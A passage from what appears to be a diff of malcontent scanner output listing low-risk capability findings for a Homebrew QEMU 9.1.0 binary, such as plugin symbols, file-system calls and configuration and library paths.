[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | | LOW | [exec/system_controls/systemd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/system_controls/systemd.yara#ref_systemd) | makes references to systemd | [systemd](https://github.com/search?q=systemd&type=code) | | LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | @@ -81,10 +81,10 @@ | LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [mount](https://github.com/search?q=mount&type=code)
[-o](https://github.com/search?q=-o&type=code) | | LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | -| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
